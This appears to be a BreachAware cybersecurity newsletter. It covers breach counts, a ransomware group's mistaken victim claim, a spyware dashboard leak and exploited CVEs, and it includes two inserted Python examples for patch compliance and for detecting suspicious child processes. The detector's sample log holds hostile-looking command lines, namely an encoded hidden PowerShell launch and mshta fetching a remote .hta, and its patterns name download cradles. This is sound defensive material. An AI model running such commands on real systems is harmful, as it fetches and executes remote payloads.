
Sinobi’s Ransomware Own Goal, Spyware Slip-Ups & Critical CVEs You Can’t Ignore

16 February 2026
BREACHAWARE HQ
PR

A total of 18 breach events were found and analysed, resulting in 14,712,764 exposed accounts containing 29 different types of personal data. The breaches found publicly and freely available included ULP Alien Txt File - Episode 33, Stealer Log 0552, Substack, France Data Home Owners and National Union of School Sports. Sign in to view the full library of breach events, which includes, where available, reference articles relating to each breach.

Categories of Personal Data Discovered

Contact, Career, Commerce, Digital Behaviour, Technology, Unstructured, Geolocation, Sociodemographic, Finance.

Data Breach Impact

A lighter haul this week, but let’s not get too comfortable. 18 breach events were uncovered, leaking over 14 million accounts and 29 types of personal data into the wild. From niche logs like ULP's latest alien episode to more recognisable names like Substack, the damage is still real. Even modest leaks can carry heavyweight consequences for third-party organisations, especially when employee data is caught up in the mess. For individuals, it’s yet another round of digital exposure, fuelling phishing attempts, fraud, and the slow erosion of personal privacy. Smaller scale, same old story: if it’s online, it’s in the firing line.

Cyber Update

The Sinobi ransomware group had what can only be described as a PR own goal last week. With great fanfare, they posted on their darknet blog: “WE RANSOMED THE ANTI-RANSOMWARE COMPANY.” Bold claim. Very cinematic. There’s just one tiny problem. They hadn’t.

Sinobi appeared to believe they had successfully compromised Halcyon.ai, a US cybersecurity firm whose entire brand identity revolves around stopping ransomware. Their homepage slogan? “Detect. Disrupt. Defeat Ransomware.” Punchy. Memorable. Slightly awkward if you’ve just been breached by the very thing you’re fighting.

Except… they hadn’t been breached at all.

As researchers began pulling down the leaked data, it became clear the victim wasn’t Halcyon.ai but HalcyonTek, a completely separate organisation based in India with a vaguely similar name. In short: wrong Halcyon. Wrong continent. Wrong flex.

Sinobi, who surfaced mid-summer last year and have since hit over 40 organisations, largely in manufacturing and production, suddenly went from cyber boogeyman to cautionary tale. Ransomware is ruthless, but brand confusion is undefeated.

But wait, the week’s operational security mishaps don’t stop there: a spyware company has accidentally shown off its “click to hack” button.

Enter Paragon, an Israeli surveillance company behind a spyware platform called Graphite. The tool is marketed to governments and, shall we say, “privacy flexible” customers. Graphite is designed to covertly infect mobile phones, allowing operators to monitor calls, messages, apps and media without the target knowing. Billion-dollar surveillance energy.

Now here’s where it gets spicy. Paragon posted a cheerful selfie to LinkedIn featuring two employees. Harmless enough. Except in the background was something never previously shown publicly: the Graphite dashboard.

Zoom in and you can see:
- A victim’s mobile number displayed top right (originating from Czechia, partially obscured).
- A list of apps on the compromised device.
- Messaging logs in the centre.
- Browsable messages, photos and videos on the right.

And, because subtlety is overrated, a rather large button labelled: “click to hack.” You truly couldn’t script it better. A company selling stealth-grade spyware accidentally showcasing its live interface on LinkedIn. Somewhere, an opsec manager felt a disturbance in the force.

Meanwhile, cybercrime forums operating on the clearnet are playing an increasingly exhausting game of digital whack-a-mole. Registrars have been far more proactive recently, suspending domains used by criminal forums with noticeable frequency. Monthly disruptions are becoming the norm. It’s not fatal (these sites typically migrate within 24–48 hours), but it’s undeniably inconvenient.

One well known English speaking forum has taken its users on quite the world tour recently: Japan → West Africa → American Samoa. At this point, their domain strategy resembles a gap year.

The takedowns don’t kill the communities, but they do create friction, and friction, over time, adds pressure. Whether this global tightening continues remains to be seen, but for now, registrars appear to be flexing just a little harder than usual.

Software Vulnerabilities

BeyondTrust (CVE-2026-1731) is the headline act. A pre-auth remote code execution flaw in Remote Support and Privileged Remote Access. Translation? If unpatched and internet-facing, your “secure remote help” tool becomes an attacker’s golden ticket. BeyondTrust says exploitation attempts are already in play, CISA’s KEV has it flagged as actively exploited, and the remediation deadline was… brisk. SaaS customers are covered. Self-hosted stragglers? Less so.

What it means: If someone pops your remote access appliance, they’re basically standing in the server room holding the master keys. Lateral movement and credential harvesting become alarmingly efficient.

Do now: Patch to the fixed versions (RS 25.3.2+, PRA 25.1.1+ or BT26-02), lock down inbound access, review appliance logs for anything dodgy, and rotate secrets like you mean it.

Microsoft ConfigMgr / SCCM (CVE-2024-43468) is a CVSS 9.8 SQL injection that allows unauthenticated command execution. Yes, unauthenticated. Yes, against your management plane. It’s been in the wild, it’s on KEV, and patches have existed since October 2024. If you’re still vulnerable, that’s not zero-day drama, that’s patch procrastination.

What it means: A compromised ConfigMgr site is a deployment cannon pointed at your entire estate. Malware at scale? Absolutely. Persistence? Delightfully easy (for the attacker).

Do now: Patch every site role, restrict and monitor access to site systems like they’re crown jewels, and review for unexplained admin actions or suspicious database commands.

Apple dyld (CVE-2026-20700) involves memory corruption and has reportedly been used in “extremely sophisticated” targeted attacks. That’s Apple’s polite way of saying “this isn’t theoretical”. Fixed in iOS/iPadOS 26.3 and equivalents. Also on KEV.

What it means: Today’s bespoke espionage technique is tomorrow’s off-the-shelf exploit kit. VIPs first, everyone else shortly after.

Do now: Enforce OS updates via MDM, verify compliance (don’t just tick the dashboard), and harden high-risk users: tighter app controls, fewer dodgy links, more scrutiny.

SolarWinds Web Help Desk (CVE-2025-40536) allows unauthenticated access to restricted functionality. It sounds mild. It isn’t. Fixed in WHD 2026.1, alongside several other serious flaws. KEV due date was urgent enough to raise eyebrows.

What it means: Help desks are treasure troves of credentials, tickets and workflows. A “control bypass” can quickly become a staging ground.

Do now: Upgrade to 2026.1 or pull it off the internet until you can. Audit for unknown admin changes. Lock down exposed interfaces and default credentials (because yes, attackers will try “admin/admin”).
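Three of the “Do now” items above (BeyondTrust RS/PRA, iOS/iPadOS, Web Help Desk) come down to one question: is the running version at or above the fixed one? The classic way to answer it wrongly is to compare version strings lexically, where "25.10" sorts below "25.3" and a patched appliance gets reported as vulnerable, or vice versa. The check below is an added example, not BreachAware’s or any vendor’s tooling: it takes the fixed versions quoted in this issue as floors and runs them over a constructed inventory. The hostnames, the flattened (hostname, product, version) export shape and the product labels are assumptions, and the floors should be re-checked against the vendor advisories before you rely on them.

```python
"""Patch-floor compliance check with numeric (not lexical) version comparison.

Added example, not BreachAware's or any vendor's tooling. The floors are the
fixed versions quoted in this issue; re-check them against the vendor advisories.
The inventory below is constructed sample data shaped like a flattened
MDM/CMDB export (hostname, product, reported version), which is an assumption.
"""
import re

# Minimum fixed versions quoted in the text.
FLOORS = {
    "BeyondTrust Remote Support": "25.3.2",
    "BeyondTrust PRA": "25.1.1",
    "Apple iOS": "26.3",
    "Apple iPadOS": "26.3",
    "SolarWinds Web Help Desk": "2026.1",
}

# Constructed sample inventory (hostnames and versions are made up).
INVENTORY = [
    ("rs-appliance-01", "BeyondTrust Remote Support", "25.3.2"),
    ("rs-appliance-02", "BeyondTrust Remote Support", "25.10.0"),  # lexical compare would wrongly flag this
    ("pra-appliance-01", "BeyondTrust PRA", "25.1.0"),
    ("iphone-ceo", "Apple iOS", "26.3"),
    ("ipad-cfo", "Apple iPadOS", "26.2.1"),
    ("whd-prod", "SolarWinds Web Help Desk", "12.8.5"),
    ("ipad-spare", "Apple iPadOS", ""),             # no check-in data: not proof of patching
    ("legacy-box", "Some Unlisted Product", "1.0"),  # no floor defined: flag it, don't ignore it
]


def parse_version(version):
    """'25.3.2' -> (25, 3, 2); compared as integers so 25.10 > 25.3."""
    parts = re.findall(r"\d+", version)
    if not parts:
        raise ValueError(f"unparseable version: {version!r}")
    return tuple(int(p) for p in parts)


def meets_floor(version, floor):
    """True when version >= floor, padding with zeros so '26.3' == '26.3.0'."""
    have, need = parse_version(version), parse_version(floor)
    width = max(len(have), len(need))
    have += (0,) * (width - len(have))
    need += (0,) * (width - len(need))
    return have >= need


def is_compliant(product, version):
    """Unknown products and missing versions are non-compliant: 'no data' is not 'patched'."""
    floor = FLOORS.get(product)
    if floor is None or not version:
        return False
    return meets_floor(version, floor)


def noncompliant(inventory):
    """Return (hostname, reason) for every asset that fails its floor."""
    findings = []
    for host, product, version in inventory:
        if product not in FLOORS:
            findings.append((host, f"no floor defined for {product!r}"))
        elif not version:
            findings.append((host, "no reported version"))
        elif not meets_floor(version, FLOORS[product]):
            findings.append((host, f"{product} {version} < {FLOORS[product]}"))
    return findings


if __name__ == "__main__":
    for host, reason in noncompliant(INVENTORY):
        print(f"{host}: {reason}")
```

Two deliberate choices: a device with no reported version and a product with no defined floor are both reported, because a green dashboard built on missing data is exactly the “just tick the box” failure the text warns about. Run it and the two BeyondTrust appliances come out clean, while the PRA box, the iPad, the old WHD install and the two data gaps are listed.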

Microsoft MSHTML (CVE-2026-21513) is a security feature bypass with a CVSS 8.8. Exploited. Requires user interaction. So, classic lure-and-click territory. It’s the sort of bug attackers chain with others because it “plays well with friends”.

What it means: Think phishing email → malicious HTML → bypass → payload. It’s rarely a solo act.

Do now: Deploy February 2026 updates across supported Windows systems, reinforce anti-phishing controls, and monitor for suspicious child processes spawned from Office or browser contexts.
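The “monitor for suspicious child processes spawned from Office or browser contexts” step is concrete enough to show as a rule. Below is an added example, not code from the page or from Microsoft: a small parent/child scoring check run over constructed process-creation events in a JSON-lines shape. The field names ParentImage, Image and CommandLine are borrowed from Sysmon Event ID 1, but the host field, the JSON-lines format, the sample events and the point values are all assumptions for the demo. It flags shells, script hosts and common LOLBins launched by Office or browser processes and bumps the score for command-line tells such as -enc, -nop or a hidden window, which is the phishing email → HTML → payload chain the paragraph describes.

```python
"""Flag script hosts and LOLBins spawned by Office or browser processes.

Added example, not BreachAware's or Microsoft's code. Events are JSON lines
with ParentImage / Image / CommandLine fields (names borrowed from Sysmon
Event ID 1); the host field, the JSON-lines shape, the sample events and the
scores are all constructed assumptions for the demo.
"""
import json
import re

# Parents that should almost never launch a shell or script host directly.
LURE_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "msedge.exe", "chrome.exe", "firefox.exe", "iexplore.exe",
}
# Children whose appearance under those parents usually means a payload ran.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe",
}
# Command-line tells; each match adds one point.
CMDLINE_TELLS = [
    r"-enc(odedcommand)?\s",   # base64-encoded PowerShell
    r"-nop\b",                 # -NoProfile
    r"\bhidden\b",             # -WindowStyle hidden
    r"downloadstring|downloadfile|iwr\b|invoke-webrequest",
    r"\bhttps?://",            # remote payload fetch
]

# Constructed sample telemetry (hosts, paths and command lines are made up).
SAMPLE_LOG = "\n".join([
    r'{"host":"WS-042","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA"}',
    r'{"host":"WS-042","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\notepad.exe","CommandLine":"notepad.exe report.txt"}',
    r'{"host":"WS-117","ParentImage":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","Image":"C:\\Windows\\System32\\mshta.exe","CommandLine":"mshta.exe https://example.invalid/a.hta"}',
    r'{"host":"WS-117","ParentImage":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","Image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","CommandLine":"chrome.exe --type=renderer"}',
    r'{"host":"WS-009","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE","Image":"C:\\Program Files\\Adobe\\Acrobat\\Acrobat.exe","CommandLine":"Acrobat.exe invoice.pdf"}',
    r'{"host":"WS-033","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -Command Get-Date"}',
])


def basename(path):
    """Last path component, lower-cased, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    if parent not in LURE_PARENTS:
        return 0, []
    score, reasons = 0, []
    if child in SUSPICIOUS_CHILDREN:
        score += 2
        reasons.append(f"{parent} spawned {child}")
    cmdline = event.get("CommandLine", "")
    for pattern in CMDLINE_TELLS:
        if re.search(pattern, cmdline, re.IGNORECASE):
            score += 1
            reasons.append(f"command line matches /{pattern}/")
    return score, reasons


def detect(log_text, threshold=2):
    """Parse JSON-lines telemetry and return alerts at or above threshold."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        score, reasons = score_event(event)
        if score >= threshold:
            alerts.append({"host": event.get("host", "?"), "score": score,
                           "reasons": reasons, "cmdline": event.get("CommandLine", "")})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(f"[{alert['score']}] {alert['host']}: {'; '.join(alert['reasons'])}")
```

On the constructed sample this raises three alerts: the Word → cmd → encoded hidden PowerShell chain scores highest, Chrome launching mshta against a URL comes next, and Word spawning a plain PowerShell command still trips the default threshold on the parent/child pair alone. Explorer launching Notepad, Chrome spawning its own renderer and Outlook opening a PDF in Acrobat all stay quiet, which is the kind of benign noise a rule like this has to tolerate before it is worth paging anyone on.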

Data & Privacy Headlines

Odido (Netherlands) disclosed a cyber-attack impacting customer contact system data. No passwords or billing info, but contact data alone is prime phishing fuel. They’ve warned customer notifications may take up to 48 hours. Not the sentence you want in your crisis script.

Impact: Expect telco-themed scams with frightening credibility. Employees affected as consumers can become your next internal phishing victim.

Do now: Brief SOC and fraud teams, remind staff to verify “account issues” out-of-band, and tighten controls around payment or supplier detail changes.

Conduent supply-chain spillover (Volvo Group North America) shows the third-party blast radius in full effect. Nearly 17,000 individuals impacted, breach window stretching months, notifications rolling out with identity monitoring attached. Conduent had disclosed its own incident previously. Dominoes fall.

Impact: It’s not just “vendor got breached”; it’s regulatory scrutiny, comms overhead, and fraud risk landing downstream.

Do now: Review which vendors handle large-scale PII/PHI, validate notification clauses, and treat processors and mailrooms like critical suppliers, not background noise.

CJEU & WhatsApp vs the EDPB: the EU’s top court says binding EDPB decisions can be challenged. The €225m fine context adds flavour. This could reshape dispute-resolution dynamics under GDPR.

Impact: Enforcement timelines and leverage in cross-border cases may get… interesting. Procedure matters as much as substance.

Do now: Privacy and legal teams should track developments, revisit enforcement-risk assumptions, and document decisions with future scrutiny in mind.

EDPB 2026–2027 Work Programme promises guidance on anonymisation, legitimate interest, children’s data, consent-or-pay models, and GDPR/AI Act interplay. In other words, they’re sharpening the blurry edges.

Impact: If you lean heavily on legitimate interest, AI processing, or bold anonymisation claims, your compliance baseline may shift.

Do now: Map dependencies, prepare to refresh templates and DPIAs, and keep governance calendars flexible.

CNIL’s 2025 enforcement scoreboard: 83 sanctions, 259 decisions, and nearly €487m in cumulative fines. Themes? Cookies, employee monitoring, and good old-fashioned security basics.

Impact: Regulators still care deeply about trackers and internal surveillance. And “boring” control failures keep showing up in penalty write-ups.

Do now: Audit cookie consent flows, re-check employee monitoring transparency, and run a quick hygiene sweep on passwords, shared accounts, and access controls.

Smarter Protection Starts with Awareness

Third-party exposure is now a first-order risk. You can’t patch what you can’t see.
Free Data Breach Exposure Scan: Check any domain in seconds: https://breachaware.com/scan
